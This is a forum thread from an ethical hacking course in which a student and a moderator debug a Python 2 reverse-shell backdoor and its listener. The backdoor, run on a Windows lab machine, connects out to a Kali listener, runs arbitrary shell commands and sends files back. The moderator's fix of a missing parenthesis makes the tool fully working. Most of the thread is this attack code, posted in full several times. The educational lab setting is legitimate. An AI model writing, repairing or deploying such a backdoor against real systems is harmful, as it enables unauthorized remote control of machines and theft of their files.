Viewing 15 posts - 1 through 15 (of 15 total)
  • Author
    Posts
  • #38060
    cybersamuraiDKcybersamuraiDK
    Participant

    So i am following the course: Learn Python & Ethical Hacking From Scratch with Zaid.

    And i am in the section where we setup a backdoor on our windows machine, and a listener in kali linux.

    I have followed Zaid’s video 100% and this is the listener code:

    #!/usr/bin/env python

    import socket
    import json

    class Listener:
    def __init__(self, ip, port):
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((ip, port))
    listener.listen(0)
    print(“[+] Waiting for incoming connections”)
    self.connection, address = listener.accept()
    print(“[+] Got a connection from ” + str(address))

    def reliable_send(self, data):
    json_data = json.dumps(data)
    self.connection.send(json_data)

    def reliable_receive(self):
    json_data = “”
    while True:
    try:
    json_data = json_data + self.connection.recv(1024)
    return json.loads(json_data)
    except ValueError:
    continue

    def execute_remotely(self, command):
    self.reliable_send(command)
    if command[0] == “exit”:
    self.connection.close()
    exit()

    return self.reliable_receive

    def write_file(self, path, content):
    with open(path, “wb”) as file:
    file.write(content)
    return “[+] Download successful.”

    def run(self):
    while True:
    command = raw_input(“>> “)
    command = command.split(” “)
    result = self.execute_remotely(command)
    if command[0] == “download”:
    result = self.write_file(command[1], result)

    print(result())

    my_listener = Listener(“10.0.2.10”, 4444)
    my_listener.run()

    ————————————————————————————————————————————–

    I had to rework **print(result())**

    Otherwise it looked like this when doing system commands:

    [+] Got a connection from (‘10.0.2.15’, 49848)
    >> dir
    **<bound method Listener.reliable_receive of <__main__.Listener instance at 0x7f7aa7776190>>**

    But now when i try to download a sample.txt from my windows machine i get this error:

    [+] Got a connection from (‘10.0.2.15’, 49846)
    >> download sample.txt
    Traceback (most recent call last):
    File “listener.py”, line 55, in <module>
    my_listener.run()**
    File “listener.py”, line 49, in run
    result = self.write_file(command[1], result)
    File “listener.py”, line 40, in write_file
    file.write(content)
    TypeError: argument 1 must be string or buffer, not instancemethod

    It am stuck in this point until i can make it work! have been spending days trying to figure it out πŸ™ please help

    #38092
    diegodiego
    Moderator

    Hi CyberSamurai!
    It looks like the error may be in the backdoor code.
    Can you share it please? Also it would be better to share it including identation cause it’s defficult to read it this way.

    Thanks!
    Diego

    #38116
    cybersamuraiDKcybersamuraiDK
    Participant

    Yes sir πŸ™‚

    This is the backdoor code running on my windows 10 machine.

    #!/usr/bin/env python
    
    import socket 
    import subprocess
    import json
    import os
    
    class Backdoor:
    	def __init__(self, ip, port):
    		self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    		self.connection.connect((ip, port))
    
    	def reliable_send(self, data):
    		json_data = json.dumps(data)
    		self.connection.send(json_data)
    
    	def reliable_receive(self):
    		json_data = ""
    		while True:
    			try:
    			    json_data = self.connection.recv(1024)
    		            return json.loads(json_data)
    			except ValueError:
    			    continue		
    	
    	def execute_system_command(self, command):
    		return subprocess.check_output(command, shell=True)
    
    	def change_working_directory_to(self, path):
    		os.chdir(path)
    		return "[+] Changing CD to " + path	
    		
    
    	def read_file(self, path):
    		with open(path, "rb") as file:
    			return file.read()  	
    
    	def run(self):
    		while True:
    	            command = self.reliable_receive()
    		    if command[0] == "exit":
    			 self.connection.close()
    			 exit()
    		    elif command[0] == "cd" and len(command) > 1:
    			command_result = self.change_working_directory_to(command[1])
    		    elif command[0] == "download":
    			command_result = self.read_file(command[1])
    		    else:
    			command_result = self.execute_system_command(command)
    		    self.reliable_send(command_result)
    		
    my_backdoor = Backdoor("10.0.2.10", 4444)
    my_backdoor.run()
    #38223
    diegodiego
    Moderator

    Hi!
    Thanks!

    Following both codes it results you have this line at the bottom of your listener:

    print(result())

    please remove the parenthesis of result. Like this print(result)

    Let me know how it goes!
    Diego

    #38243
    cybersamuraiDKcybersamuraiDK
    Participant

    When i remove the () from print(result()). All terminal commands are like this:

    [email protected]:~/PycharmProjects/Malware/Backdoor# python listener.py
    [+] Waiting for incoming connections
    [+] Got a connection from (‘10.0.2.15’, 49834)
    >> dir
    <bound method Listener.reliable_receive of <__main__.Listener instance at 0x7f1b331b90f0>>
    >>

    #38314
    diegodiego
    Moderator

    Hi! That’s wired. cause calling result() is like calling a function and not a variable.
    Can you share the listner again but with identation please?
    Also can you add a print in the reliable_recieve function just before the return:
    print(json.loads(json_data))

    Let me know.
    Diego

    #38318
    cybersamuraiDKcybersamuraiDK
    Participant

    This is the code πŸ™‚ thank you for helping me out, i am a little bit stuck, cant go any further in the course.

    forgot something will add more in a moment

    #38323
    cybersamuraiDKcybersamuraiDK
    Participant

    thank you for helping me out πŸ™‚

    I still get the same:—————————————————————————
    [+] Waiting for incoming connections
    [+] Got a connection from (‘10.0.2.15’, 49707)
    >> dir
    <bound method Listener.reliable_receive of <__main__.Listener instance at 0x7fa8d4aa5190>>
    >>

    ————————————————————————————————

    #!/usr/bin/env python
    
    import socket
    import json
    
    class Listener:
        def __init__(self, ip, port):
            listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind((ip, port))
            listener.listen(0)
            print("[+] Waiting for incoming connections")
            self.connection, address = listener.accept()
            print("[+] Got a connection from " + str(address))
    
        def reliable_send(self, data):
            json_data = json.dumps(data)
            self.connection.send(json_data)
    
        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024)
                    print(json.loads(json_data))
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def execute_remotely(self, command):
            self.reliable_send(command)
            if command[0] == "exit":
                self.connection.close()
                exit()
    
            return self.reliable_receive
    
        def write_file(self, path, content):
            with open(path, "wb") as file:
                file.write(content)
                return "[+] Download successful."
    
        def run(self):
            while True:
                command = raw_input(">> ")
                command = command.split(" ")
                result = self.execute_remotely(command)
    
                if command[0] == "download":
                    result = self.write_file(command[1], result)
    
                print(result)
    
    my_listener = Listener("10.0.2.10", 4444)
    my_listener.run()
    
    #38324
    cybersamuraiDKcybersamuraiDK
    Participant

    The real strange thing is, that if i write the code like this:

    #!/usr/bin/env python
    
    import socket
    import json
    
    class Listener:
        def __init__(self, ip, port):
            listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind((ip, port))
            listener.listen(0)
            print("[+] Waiting for incoming connections")
            self.connection, address = listener.accept()
            print("[+] Got a connection from " + str(address))
    
        def reliable_send(self, data):
            json_data = json.dumps(data)
            self.connection.send(json_data)
    
        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024)
                    print(json.loads(json_data))
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def execute_remotely(self, command):
            self.reliable_send(command)
            if command[0] == "exit":
                self.connection.close()
                exit()
    
            return self.reliable_receive
    
        def write_file(self, path, content):
            with open(path, "wb") as file:
                file.write(content)
                return "[+] Download successful."
    
        def run(self):
            while True:
                command = raw_input(">> ")
                command = command.split(" ")
                result = self.execute_remotely(command)
    
                if command[0] == "download":
                    result = self.write_file(command[1], result())
    
                    print(result())
    
    my_listener = Listener("10.0.2.10", 4444)
    my_listener.run()

    I end up with this result, when trying to use “download sample.txt”:

    >> download sample.txt
    TG9yZW0gSXBzdW0gaXMgc2ltcGx5IGR1bW15IHRleHQgb2YgdGhlIHByaW50aW5nIGFuZCB0eXBlc2V0dGluZyBpbmR1c3RyeS4gTG9yZW0gSXBzdW0gaGFzIGJlZW4gdGhlIGluZHVzdHJ5J3Mgc3RhbmRhcmQgZHVtbXkgdGV4dCBldmVyIHNpbmNlIHRoZSAxNTAwcywgd2hlbiBhbiB1bmtub3duIHByaW50ZXIgdG9vayBhIGdhbGxleSBvZiB0eXBlIGFuZCBzY3JhbWJsZWQgaXQgdG8gbWFrZSBhIHR5cGUgc3BlY2ltZW4gYm9vay4gSXQgaGFzIHN1cnZpdmVkIG5vdCBvbmx5IGZpdmUgY2VudHVyaWVzLCBidXQgYWxzbyB0aGUgbGVhcCBpbnRvIGVsZWN0cm9uaWMgdHlwZXNldHRpbmcsIHJlbWFpbmluZyBlc3NlbnRpYWxseSB1bmNoYW5nZWQuIEl0IHdhcyBwb3B1bGFyaXNlZCBpbiB0aGUgMTk2MHMgd2l0aCB0aGUgcmVsZWFzZSBvZiBMZXRyYXNldCBzaGVldHMgY29udGFpbmluZyBMb3JlbSBJcHN1bSBwYXNzYWdlcywgYW5kIG1vcmUgcmVjZW50bHkgd2l0aCBkZXNrdG9wIHB1Ymxpc2hpbmcgc29mdHdhcmUgbGlrZSBBbGR1cyBQYWdlTWFrZXIgaW5jbHVkaW5nIHZlcnNpb25zIG9mIExvcmVtIElwc3VtLg0KDQpXaHkgZG8gd2UgdXNlIGl0Pw0KSXQgaXMgYSBsb25nIGVzdGFibGlzaGVkIGZhY3QgdGhhdCBhIHJlYWRlciB3aWxsIGJlIGRpc3RyYWN0ZWQgYnkgdGhlIHJlYWRhYmxlIGNvbnRlbnQgb2YgYSBwYWdlIHdoZW4gbG9va2luZyBhdCBpdHMgbGF5b3V0LiBUaGUgcG9pbnQgb2YgdXNpbmcgTG9yZW0gSXBzdW0gaXMgdGhhdCBpdCBoYXMgYSBtb3JlLW9yLWxlc3Mgbm9ybWFsIGRpc3RyaWJ1dGlvbiBvZiBsZXR0ZXJzLCBhcyBvcHBvc2VkIHRvIHVzaW5nICdDb250ZW50IGhlcmUsIGNvbnRlbnQgaGVyZScsIG1ha2luZyBpdCBsb29rIGxpa2UgcmVhZGFibGUgRW5nbGlzaC4gTWFueSBkZXNrdG9wIHB1Ymxpc2hpbmcgcGFja2FnZXMgYW5kIHdlYiBwYWdlIGVkaXRvcnMgbm93IHVzZSBMb3JlbSBJcHN1bSBhcyB0aGVpciBkZWZhdWx0IG1vZGVsIHRleHQsIGFuZCBhIHNlYXJjaCBmb3IgJ2xvcmVtIGlwc3VtJyB3aWxsIHVuY292ZXIgbWFueSB3ZWIgc2l0ZXMgc3RpbGwgaW4gdGhlaXIgaW5mYW5jeS4gVmFyaW91cyB2ZXJzaW9ucyBoYXZlIGV2b2x2ZWQgb3ZlciB0aGUgeWVhcnMsIHNvbWV0aW1lcyBieSBhY2NpZGVudCwgc29tZXRpbWVzIG9uIHB1cnBvc2UgKGluamVjdGVkIGh1bW91ciBhbmQgdGhlIGxpa2UpLg0KDQpDb250cmFyeSB0byBwb3B1bGFyIGJlbGllZiwgTG9yZW0gSXBzdW0gaXMgbm90IHNpbXBseSByYW5kb20gdGV4dC4gSXQgaGFzIHJvb3RzIGluIGEgcGllY2Ugb2YgY2xhc3NpY2FsIExhdGluIGxpdGVyYXR1cmUgZnJvbSA0NSBCQywgbWFraW5nIGl0IG92ZXIgMjAwMCB5ZWFycyBvbGQuIFJpY2hhcmQgTWNDbGludG9jaywgYSBMYXRpbiBwcm9mZXNzb3IgYXQgSGFtcGRlbi1TeWRuZXkgQ29sbGVnZSBpbiBWaXJnaW5pYSwgbG9va2VkIHVwIG9uZSBvZiB0aGUgbW9yZSBvYnNjdXJlIExhdGluIHdvcmRzLCBjb25zZWN0ZXR1ciwgZnJvbSBhIExvcmVtIElwc3VtIHBhc3NhZ2UsIGFuZCBnb2luZyB0aHJvdWdoIHRoZSBjaXRlcyBvZiB0aGUgd29yZCBpbiBjbGFzc2ljYWwgbGl0ZXJhdHVyZSwgZGlzY292ZXJlZCB0aGUgdW5kb3VidGFibGUgc291cmNlLiBMb3JlbSBJcHN1bSBjb21lcyBmcm9tIHNlY3Rpb25zIDEuMTAuMzIgYW5kIDEuMTAuMzMgb2YgImRlIEZpbmlidXMgQm9ub3J1bSBldCBNYWxvcnVtIiAoVGhlIEV4dHJlbWVzIG9mIEdvb2QgYW5kIEV2aWwpIGJ5IENpY2Vybywgd3JpdHRlbiBpbiA0NSBCQy4gVGhpcyBib29rIGlzIGEgdHJlYXRpc2Ugb24gdGhlIHRoZW9yeSBvZiBldGhpY3MsIHZlcnkgcG9wdWxhciBkdXJpbmcgdGhlIFJlbmFpc3NhbmNlLiBUaGUgZmlyc3QgbGluZSBvZiBMb3JlbSBJcHN1bSwgIkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0Li4iLCBjb21lcyBmcm9tIGEgbGluZSBpbiBzZWN0aW9uIDEuMTAuMzIuDQo=
    Traceback (most recent call last):
    File “temp.py”, line 57, in <module>
    my_listener.run()
    File “temp.py”, line 53, in run
    print(result())
    TypeError: ‘str’ object is not callable

    #38441
    diegodiego
    Moderator

    Hi!
    Yeah, this last issue makes more sense, it happens cause () makes python think is a function when it is a string, that’s why the error says that a string can not be callable.
    Will test your code and let you know.

    Are you using python2 or 3 to run the code?

    Greetings!
    Diego

    #38443
    cybersamuraiDKcybersamuraiDK
    Participant

    I am using python 2 πŸ™‚ just like Zaid in the course.

    #38528
    diegodiego
    Moderator

    Hi!
    Ok! I haven’t had time to test your code yet, will come back as soon as I do it.

    Greetings!
    Diego

    #38799
    diegodiego
    Moderator

    Hi!
    Sorry to replay until now but haven’t had so much time to test your code.
    Now I did it and found the error, in line “return self.reliable_receive” in execute_remotely you are missing the parenthesis, it should be like this:
    return self.reliable_receive() this will make it work.

    Greetings!
    Diego

    #38824
    cybersamuraiDKcybersamuraiDK
    Participant

    Diego πŸ™‚ i want to thank you with all my heart! It freakin works! πŸ˜€ πŸ˜€

    You dont know how many hours/days i have used to try an solve this. I am takin an exam today about cybersec, and this was going to be my master piece πŸ™‚ so you could imagine HOW MUCH i was sweating and biting nails because i couldnt get it to work.

    Thank you πŸ™‚ MY presentation is saved!

    #38920
    diegodiego
    Moderator

    Hi!

    Cool you got it! Glad to help!
    Diego

Viewing 15 posts - 1 through 15 (of 15 total)
  • You must be logged in to reply to this topic.